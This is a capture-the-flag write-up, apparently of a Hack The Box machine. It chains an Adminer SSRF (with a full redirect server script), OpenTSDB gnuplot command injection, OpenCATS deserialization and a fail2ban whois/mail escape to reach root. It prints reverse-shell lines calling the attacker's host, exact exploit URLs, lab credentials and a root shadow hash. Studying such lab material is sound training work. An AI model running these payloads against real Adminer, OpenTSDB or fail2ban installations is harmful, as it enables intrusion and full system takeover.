Basic information

Port scan

A full-port scan is needed. Scanning from a local machine is very slow, so using the Pwnbox is recommended. Also pay attention to the scan options: the scan below uses -sF (FIN scan), which cannot tell open from filtered ports, hence the open|filtered states. A port reported as plain filtered (4242 here) means the probe was answered with an ICMP unreachable error, i.e. a firewall rule rather than a closed socket, which is why that port is only reachable later through SSRF:

sudo nmap -p- -sF -v 10.10.11.137

Nmap scan report for 10.10.11.137
Host is up (0.0021s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
4242/tcp filtered vrml-multi-use
16010/tcp open|filtered unknown
16030/tcp open|filtered unknown

└──╼ [★]$ sudo nmap -sC -sV -sF -p22,80,4242,16010,16030 10.10.11.137
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-28 08:21 GMT
Nmap scan report for 10.10.11.137
Host is up (0.0021s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 99:33:47:e6:5f:1f:2e:fd:45:a4:ee:6b:78:fb:c0:e4 (RSA)
| 256 4b:28:53:64:92:57:84:77:5f:8d:bf:af:d5:22:e1:10 (ECDSA)
|_ 256 71:ee:8e:e5:98:ab:08:43:3b:86:29:57:23:26:e9:10 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Admirer
|_http-server-header: Apache/2.4.38 (Debian)
4242/tcp filtered vrml-multi-use
16010/tcp open|filtered tcpwrapped
16030/tcp open|filtered tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.14 seconds

Port 80

Subdomains

Requesting any non-existent path returns a 404 page; the contact email address on it reveals the domain name:

After adding it to /etc/hosts, a vhost scan finds a db subdomain:

10.10.11.137 admirer-gallery.htb

gobuster vhost -u http://admirer-gallery.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50 -r

Found: db.admirer-gallery.htb (Status: 200) [Size: 2569]

Add it to /etc/hosts as well and visit it:

Adminer

The login form carries pre-filled credentials (a read-only MySQL account) in hidden fields; once inside there is nothing of much use:

<input type="hidden" name="auth[driver]" value="server">
<input type="hidden" name="auth[server]" value="localhost">
<input type="hidden" name="auth[username]" value="admirer_ro">
<input type="hidden" name="auth[password]" value="1w4nn4b3adm1r3d2!">
<input type='hidden' name="auth[db]" value="admirer"/>
<input type='hidden'

SSRF

A search turns up a known SSRF in Adminer: when connecting with the Elasticsearch driver it follows HTTP redirects from the configured server and shows the response, so an attacker-controlled server can bounce the request to any host the Adminer box can reach.

SSRF to OpenTSDB

Adminer supports other drivers, for example Elasticsearch (auth[driver]=elastic). Change the driver, point auth[server] at our redirect script (redirect.py below), and the redirect lands on OpenTSDB on port 4242:

OpenTSDB getshell

OpenTSDB has a known command injection: the /q endpoint passes query parameters such as yrange into a generated gnuplot script, and gnuplot's system() function runs shell commands. From here it is just a matter of working through it step by step (confirm the version, find an existing metric name with /api/suggest, then inject into yrange):

python redirect.py -i 10.10.14.10 --port 7777 http://127.0.0.1:4242/api/version

"version":"2.4.0"

python redirect.py -i 10.10.14.10 --port 7777 http://127.0.0.1:4242/api/suggest?type=metrics

["http.stats.web.hits"]

bash -c 'exec bash -i &>/dev/tcp/10.10.14.10/4444 <&1'
%22bash%20-c%20'exec%20bash%20-i%20%26%3E/dev/tcp/10.10.14.10/4444%20%3C%261'%22

python redirect.py -i 10.10.14.10 --port 7777 "http://127.0.0.1:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system(%22bash%20-c%20'exec%20bash%20-i%20%26%3E/dev/tcp/10.10.14.10/4444%20%3C%261'%22)%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"

Password

With a shell as www-data, search the Adminer install for files that might hold password configuration:

grep -iRl 'pass' /var/www/adminer/ 2>/dev/null
/var/www/adminer/plugins/data/servers.php
/var/www/adminer/plugins/oneclick-login.php
/var/www/adminer/plugins/plugin.php
/var/www/adminer/adminer-included-0ae90598f37b20e3e7eb122c427729ed.php

/var/www/adminer/plugins/data/servers.php contains a commented-out, fairly complex password for the admirer account (the read-only one is what the login form uses):

<?php
return [
'localhost' => array(
// 'username' => 'admirer',
// 'pass' => 'bQ3u7^AxzcB7qAsxE3',
// Read-only account for testing
'username' => 'admirer_ro',
'pass' => '1w4nn4b3adm1r3d2!',
'label' => 'MySQL',
'databases' => array(
'admirer' => 'Admirer DB',
)
),
];

redirect.py

#!/usr/bin/env python3
# Minimal HTTP server that answers every GET/POST with a 301 redirect to a
# fixed URL. Adminer's Elasticsearch driver follows the redirect, which is
# what turns the Adminer SSRF into a request against OpenTSDB on 127.0.0.1:4242.
# Python 3 port of the original Python 2 script (SimpleHTTPServer/SocketServer
# became http.server/socketserver); behaviour is unchanged.

import argparse
import http.server
import socketserver


def redirect_handler_factory(url):
    """
    Returns a request handler class that redirects to the supplied `url`
    """
    class RedirectHandler(http.server.SimpleHTTPRequestHandler):
        def do_GET(self):
            self.send_response(301)
            self.send_header('Location', url)
            self.end_headers()

        def do_POST(self):
            self.send_response(301)
            self.send_header('Location', url)
            self.end_headers()

    return RedirectHandler


def main():

    parser = argparse.ArgumentParser(description='HTTP redirect server')

    parser.add_argument('--port', '-p', action="store", type=int, default=80, help='port to listen on')
    parser.add_argument('--ip', '-i', action="store", default="", help='host interface to listen on')
    parser.add_argument('redirect_url', action="store")

    myargs = parser.parse_args()

    redirect_url = myargs.redirect_url
    port = myargs.port
    host = myargs.ip

    redirectHandler = redirect_handler_factory(redirect_url)

    # avoid "Address already in use" when the script is restarted with a new URL
    socketserver.TCPServer.allow_reuse_address = True
    handler = socketserver.TCPServer((host, port), redirectHandler)
    print("serving at port %s" % port)
    handler.serve_forever()

if __name__ == "__main__":
    main()

User flag

The password found above is reused as jennifer's SSH password:

jennifer
bQ3u7^AxzcB7qAsxE3

Privilege escalation enumeration

OpenCATS

There is another web application listening only on local port 8080; forward it out over SSH:

ssh -L 8888:localhost:8080 jennifer@10.10.11.137

This OpenCATS version has known vulnerabilities:

Services

Among the running services is fail2ban, in an old version:

systemctl list-units --type=service

...
fail2ban.service loaded active running Fail2Ban Service
...

jennifer@admirertoo:~$ fail2ban-server -V
Fail2Ban v0.10.2

Copyright (c) 2004-2008 Cyril Jaquier, 2008- Fail2Ban Contributors
Copyright of modifications held by their respective authors.
Licensed under the GNU General Public License v2 (GPL).

OpenCATS exploitation

Database

/opt/opencats/config.php gives the database credentials. The admin hash cannot be cracked, but since OpenCATS stores unsalted MD5 hashes it can simply be overwritten with the MD5 of a password we choose:

/* Database configuration. */
define('DATABASE_USER', 'cats');
define('DATABASE_PASS', 'adm1r3r0fc4ts');
define('DATABASE_HOST', 'localhost');
define('DATABASE_NAME', 'cats_dev');

MariaDB [cats_dev]> select user_name,password,user_id from user\G
*************************** 1. row ***************************
user_name: admin
password: dfa2a420a4e48de6fe481c90e295fe97
user_id: 1
*************************** 2. row ***************************
user_name: cats@rootadmin
password: cantlogin
user_id: 1250
*************************** 3. row ***************************
user_name: jennifer
password: f59f297aa82171cc860d76c390ce7f3e
user_id: 1251
3 rows in set (0.001 sec)

-- 482c811da5d5b4bc6d497ffa98491e38 is md5('password123')
MariaDB [cats_dev]> update user set password = '482c811da5d5b4bc6d497ffa98491e38' where user_id = 1;

Deserialization: arbitrary file write

Testing the deserialization with a phpggc Guzzle/FW1 gadget shows that files can be written as the devel user. devel cannot log in (nologin shell), but it owns the /usr/local/etc configuration directory:

./phpggc -u --fast-destruct Guzzle/FW1 /dev/shm/test.txt ./test.txt

jennifer@admirertoo:~$ ls -al /dev/shm/test.txt
-rw-r--r-- 1 devel devel 56 Jan 28 07:06 /dev/shm/test.txt
jennifer@admirertoo:~$ grep 'devel' /etc/passwd
devel:x:1003:1003::/home/devel:/sbin/nologin
jennifer@admirertoo:~$ find / -group devel 2>/dev/null
/dev/shm/test.txt
/opt/opencats/INSTALL_BLOCK
/usr/local/src
/usr/local/etc

Fail2Ban

Looking at the configuration shows that fail2ban protects SSH by default and that the ban action sends an email containing whois output for the banned IP:

According to the vulnerability description on GitHub, controlling the whois response gives command execution: the action pipes the output of whois <ip> into mail, and mailutils' mail treats a line beginning with ~| as an escape that pipes through a shell command. We cannot edit /etc/hosts to hijack the whois server, but the OpenCATS deserialization can write the whois configuration file /usr/local/etc/whois.conf as devel. The gadget writes some other data in front of our content, though:

Following the whois.conf documentation (a regular expression followed by the server to use), close off the leading data so that the rest of the line is a pattern matching any query and points the whois server at our host:

}]|. [10.10.14.12]

Exploit & root flag

The full chain: use the deserialization to write the whois config file so that lookups go to our whois server, have that server answer with the reverse-shell payload, then trigger a fail2ban ban through SSH so that the ban action runs whois, mail executes the ~| line, and we get a shell as root (fail2ban runs as root):

# 1. write whois.conf as devel through the OpenCATS deserialization;
#    ./test.txt holds the closing line shown above
./phpggc -u --fast-destruct Guzzle/FW1 /usr/local/etc/whois.conf  ./test.txt

# 2. rshell file: the whois answer, a mail ~| escape running a reverse shell
~| bash -c "bash -i >& /dev/tcp/10.10.14.12/4444 0>&1" &

# 3. fake whois server on the attacker box (whois uses TCP 43), plus a
#    listener on 4444 for the shell
ncat -nvlkp 43 -c "cat ./rshell"

# 4. check from the box that whois lookups now reach our server
jennifer@admirertoo:~$ whois 10.10.14.12
~| bash -c "bash -i >& /dev/tcp/10.10.14.12/4444 0>&1" &

# 5. trigger the ban: repeated failed SSH logins from 10.10.14.12
ssh root@10.10.11.137

# 6. the root shell arrives on the 4444 listener
cat /etc/shadow
root:$6$eP5MVyB1lXtVQgzU$H4xJdGiHfSu9JmUR80juqHC5BAca79yir2Z6bipW8s.DowTuNRo82/CjN7EMBK8lczD1AMYxgKTIp79DjN2R31:18817:0:99999:7:::

References